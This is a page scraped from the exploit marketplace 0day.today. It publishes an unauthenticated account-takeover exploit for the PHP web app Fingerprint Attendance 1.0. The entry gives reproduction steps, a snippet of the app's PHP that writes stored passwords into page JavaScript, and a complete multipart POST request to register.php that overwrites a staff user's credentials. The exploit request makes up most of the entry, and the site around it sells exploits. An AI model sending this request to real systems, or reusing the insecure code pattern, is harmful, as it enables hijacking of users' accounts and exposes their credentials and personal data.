0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Fingerprint Attendance 1.0 Account Takeover Vulnerability
# Title: Fingerprint Attendance 1.0 Account Takeover # Author: Hejap Zairy # Vendor: https://www.vetbossel.in/fingerprint-attendance-project-php/ # Software: https://app.box.com/s/xlyqalhvayq8oi25tqykcbouzrrjytqy # Reference: https://github.com/Matrix07ksa # Tested on: Windows, MySQL, Apache Fingerprint Attendance is vulnerable to unauthenticated account takeover. An attacker can takeover any registered 'Staff' user account by just sending below POST request By changing the the "id", "firstname", "lastname" , "username" , "password" ,"type" parameters #Steps to Reproduce 1. Send the below POST request by changing "id", "firstname", "lastname" , "username" , "password" ,"type" parameters. 2. Go to /fingerprint/src/ and Log in to the user account by changed username and password #vulnerability Code php ``` <?php echo "document.getElementById('fname').value = '".$qry["first_name"]."';"; echo "document.getElementById('lname').value = '".$qry["last_name"]."';"; echo "document.getElementById('NRIC').value = '".$qry["NRIC"]."';"; echo "document.getElementById('email').value = '".$qry["email"]."';"; echo "document.getElementById('contact').value = '".$qry["mobile"]."';"; echo "document.getElementById('contact2').value = '".$qry["mobile2"]."';"; echo "document.getElementById('line1').value = '".$qry["password"]."';"; echo "document.getElementById('line2').value = '".$qry["line1"]."';"; echo "document.getElementById('line3').value = '".$qry["line2"]."';"; echo "document.getElementById('city').value = '".$qry["city"]."';"; echo "document.getElementById('zip').value = '".$qry["zip"]."';"; echo "document.getElementById('country').value = '".$qry["country"]."';"; echo "document.getElementById('bankName').value = '".$qry["bankName"]."';"; echo "document.getElementById('bankDetail').value = '".$qry["bankDetail"]."';"; echo "document.getElementById('job').value = '".$qry["jobTitle"]."';"; ?> ``` # Description: Account takeover is one form of identity theft attack in which bad actors gain access to an account and make unauthorized transactions. Account takeover attacks can target any website that uses a login to guard valuable information [+] Payload POST ``` POST /fingerprint/src/register.php HTTP/1.1 Host: 0day.gov User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------3324626841792192532944123116 Content-Length: 2446 Origin: http://0day.gov Connection: close Referer: http://0day.gov/fingerprint/src/register.php Cookie: PHPSESSID=64cp9kf4qmus9p55o63clicu2q Upgrade-Insecure-Requests: 1 -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="fname" Admin -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="lname" admin -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="NRIC" Admin -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="emailaddress" Admin@gmail.com -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="contact" admin -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="contact2" admin -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="password" admin12345 -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="line2" -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="line3" -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="city" -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="zip" -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="country" -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="bankName" Admin -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="bankDetail" -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="job" Admin -----------------------------3324626841792192532944123116 Content-Disposition: form-data; name="button" Register -----------------------------3324626841792192532944123116-- ``` # 0day.today [2024-09-29] #